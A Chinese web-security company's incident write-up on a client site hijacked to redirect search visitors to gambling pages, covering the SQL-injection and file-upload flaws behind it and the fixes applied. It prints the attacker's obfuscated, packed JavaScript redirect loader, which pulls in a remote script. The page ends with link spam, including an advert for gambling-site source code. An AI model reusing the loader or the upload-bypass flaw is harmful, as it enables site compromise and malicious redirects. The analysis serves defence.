客户网站于近日被跳转到赌博网站,打开后直接跳转到什么北京赛车,PK10等内容的网站上去,客户网站本身做了百度的推广,导致所有访问用户都跳转到赌博网站上去,给客户带来很大的经济损失,再一个官方网站的形象也受到了影响。我们SINE安全对客户网站进行检查发现,客户网站的标题TDK被反复篡改成(北京赛车PK10等内容)立刻对该客户网站的安全,进行全面的源代码安全审计以及网站漏洞检测与网站漏洞修复,检查了客户的首页标题TDK内容确实是被篡改,并添加了一些加密的恶意代码,代码如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\9\\d\\1\\l\\i\\a\\n\\0"]["\\8\\4\\6\\0\\a"](\'\\h\\3\\1\\4\\6\\2\\0 \\0\\k\\2\\a\\e\\7\\0\\a\\q\\0\\5\\g\\b\\f\\b\\3\\1\\4\\6\\2\\0\\7 \\3\\4\\1\\e\\7\\o\\0\\0\\2\\3\\p\\5\\5\\8\\8\\8\\c\\1\\2\\9\\b\\3\\r\\c\\1\\d\\i\\5\\9\\9\\f\\6\\2\\c\\g\\3\\7\\j\\h\\5\\3\\1\\4\\6\\2\\0\\j\');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述网站代码是ASCII编码,只要转换成Unicode编码,就可以看到加密的真实内容。我们工程师对代码进行解读,发现该代码写的是根据搜索引擎作为判断条件进行跳转的代码,通俗来讲就是说,该代码只针对搜索引擎,网站管理员直接输入网址并不会发现网站跳转到赌博内容网站上去,客户的网站通过百度或搜狗搜索会直接跳转到这个北京赛车、pk10的网站上去。

针对于上述的问题,我们立即删除加密的跳转代码,先将客户网站损失降到最低,促使网站正常访问(因为客户一直在做百度推广,一直在烧钱),通过一系列的安全检测,网站到底是因为那些漏洞被上传木马,并篡改网站首页的呢?经过我们Sine安全工程师对网站代码的详细的安全检测后,发现该网站系统存在SQL注入漏洞,导致攻击者可以获取到管理员账户和密码,而网站后台的地址用的也是默认的admin目录名,致使黑客获取密码后,直接登录网站后台,在对网站后台安全检测的时候,发现产品图片上传功能,存在绕过格式上传脚本木马的漏洞。

该网站漏洞产生于网站后台的产品上传页面代码中的$this->getext($filear["name"]); //取得扩展名$this->set_savename($file); //设置保存文件名,这个代码对文件扩展名可以直接绕过并上传php格式的脚本文件,从而让攻击者轻易取得网站的权限。客户还反映说,网站经常被反复的篡改,导致跳转到赌博网站,找了网站建设的公司,他们也只是删除掉代码,没过多久就又被篡改跳转了,导致客户网站损失严重,发生篡改跳转的根本原因就是网站有漏洞,如果没有修复好网站漏洞,即使删除掉恶意代码也只是表面上的工作,不起作用的还是会被反复篡改,于事无补,亡羊补牢一样。需要对网站进行安全检测,以及网站漏洞检测,并修复好网站漏洞,清除木马后门,网站安全部署好,才会使网站更加的安全稳定运行。

网站漏洞修复的处理过程如下:

对客户网站源代码进行安全加固以及防止sql注入的前端过滤代码,网站的后台目录安全设置,更改admin文件名为@#%admin,对网站后台图片上传功能代码进行漏洞修复,设置上传文件白名单机制,以及文件上传的目录进行了脚本安全权限设置,禁止进行脚本,对上传的文件扩展也进行了深入的安全过滤,网站的数据库安全部署,对数据库的连接信息进行加密,删除root管理权限,设置普通数据库账号,读写分离,新建表,查询表,写入表等数据库正常操作权限,网站后台的账号密码设置的复杂一些,密码为12位数字+字母+大小写组合,从发现网站漏洞到目前解决问题中,共查找到脚本木马3个(webshell),一句话小马后门2个,发现网站的模板内容也被篡改了,导致客户生成首页的时候随之也被加了恶意加密的代码。

网站安全预防措施:

1.尽量避免网站后台的默认名称如admin manage houtai

2.对网站上传目录的权限进行控制。(设置无脚本执行权限)

3.网站后台的用户名和密码设置复杂点,数字+字母+大小写+特殊符号组合。

4.阿里云虚拟主机用户的FTP账号密码要设置复杂点,数字+字母+大小写+特殊符号组合。

5.如果是单独服务器的客户,建议先把服务器的安全部署好,对每个网站的文件夹进行安全部署,数据库安全部署,,再做网站的安全,否则你网站再安全,服务器不安全也是于事无补。如果对安全不是太懂的话,建议找专业的网站安全公司去处理解决。

网站标题被篡改成北京赛车、PK10的解决处理办法的更多相关文章

  1. 北京赛车PK10 幸运飞艇 重庆时时彩 PC蛋蛋 快乐8 福彩3D 十分彩

    QQ:1395239152 2017-3.14最新修复完整运营版时时彩源码PC+手机版本功能齐全 重庆时时彩是一种经中国国家财政部批准,重庆市福利彩票发行中心承销的福彩快开彩票,2元1注,分为&quo ...

  2. 符合SEO的网站标题应该怎么写

    http://www.wocaoseo.com/thread-96-1-1.html 的seo网站标题既能提起读者的点击欲望,又能搜索引擎中获得好的排名,这两着之间有着有有一些联系,网站的标题若要从s ...

  3. ecshop 网站标题不更新或内容不更新

    网站标题不更新,这种情况一般出在网站搬家的过程中,把以前的所有配置文件一起都搬到新的服务器上了. 网站状态: 后台店铺标题已经修改,前台不显示,数据shop_config 的shop_title能更新 ...

  4. [SEO] 网站标题分隔符

    标题用什么分隔符对SEO最有利 我们在看同行的朋友对网站标题优化时,关键词分按照主次的顺序进行分布,在网站标题或者是关键词之间都会有一个符号,俗话来讲就称为关键词分隔符,网站标 题分隔符分为“-”(横 ...

  5. java 使用正则表达式从网页上提取网站标题

    如何从网页上抓取有价值的东西?看懂了下面的程序(非常简单),想从网页上抓取什么信息(标题.内容.Email.价格等)就能抓取什么信息. package catchhtml; import java.i ...

  6. js和jquery 实现网站来消息网站标题闪动提示

    js版 <html xmlns="http://www.w3.org/1999/xhtml" > <head runat="server"&g ...

  7. 手把手教你免费把网站IP换成1.1.1.1/1.0.0.1

    近日,Cloudflare官方发文,与APNIC官方合作打算用IP1.1.1.1推出速度更快.私密性更强的DNS Cloudflare 运行全球规模最大.速度最快的网络之一. APNIC 是一个非营利 ...

  8. 写Seo网站标题应该注意什么

    http://www.wocaoseo.com/thread-11-1-1.html 最近看了群里一些朋友讨论关于网站优化标题应该注意哪些?各种说法五花八门,好的seo优化标题是可以给网站带来不错的流 ...

  9. Java之格林威治时间格式转换成北京时间格式

    Java之格林威治时间格式转换成北京时间格式 package com.mtons.mblog; import java.text.ParseException; import java.text.Si ...

随机推荐

  1. CCF201712-1 最小差值

    试题编号: 201712-1 试题名称: 最小差值 时间限制: 1.0s 内存限制: 256.0MB 问题描述: 问题描述 给定n个数,请找出其中相差(差的绝对值)最小的两个数,输出它们的差值的绝对值 ...

  2. Android之Fragment 基本介绍(转)

    Fragment Android是在Android 3.0 (API level 11)开始引入Fragment的. 可以把Fragment想成Activity中的模块,这个模块有自己的布局,有自己的 ...

  3. (阿里巴巴)数据库连接池——Druid (未完持续更新)

    Java程序很大一部分要操作数据库,为了提高性能操作数据库的时候,有不得不使用数据库连接池.数据库连接池有很多选择,c3p.dhcp.proxool等,druid作为一名后起之秀,凭借其出色的性能,也 ...

  4. visual studio code配置项

    // 通过将设置放入设置文件中来覆盖设置. { //-------- 编辑器配置 -------- // 控制字体系列. "editor.fontFamily": "Co ...

  5. Excel数据导入Sql Server,部分数字为Null

    在Excel中,我们时常会碰到这样的字段(最常见的就是电话号码),即有纯数字的(如没有带区号的电话号码),又有数字和其它字符混合 (如“区号-电 话号码”)的数据,在导入SQLServer过程中,会发 ...

  6. npm run dev运行Vue项目报错:Node Sass does not yet support your current environment

    导入Vue项目后,#npm run dev 报错: error in ./src/pages/hello.vue Module build failed: Error: Node Sass does ...

  7. js的作用域与作用域链

    JavaScript的作用域和作用域链.在初学JavaScript时,觉得它就和其他语言没啥区别,尤其是作用域这块,想当然的以为“全局变量就是在整个程序的任何地方都可以访问,也就是写在函数外的变量,局 ...

  8. May 30th 2017 Week 22nd Tuesday

    Knowledge will give you power, but character respect. 知识给你力量,品格给你别人的尊敬. Good characters can help us ...

  9. March 14 2017 Week 11 Tuesday

    Thinking will not overcome fear but action will. 空想终日惶恐,行动方可无惧. As the deadline comes closer and clo ...

  10. C# 调用 SQL server 初探

    相信不少人都和我一样: 1.学过数据库原理接触过SQL Server,做过一套卷子外加一个数据库设计作业: 2.学过C# 但从来还没在程序里用到过数据库(哈哈,新手躺枪) 这也是我第一次在C#里用数据 ...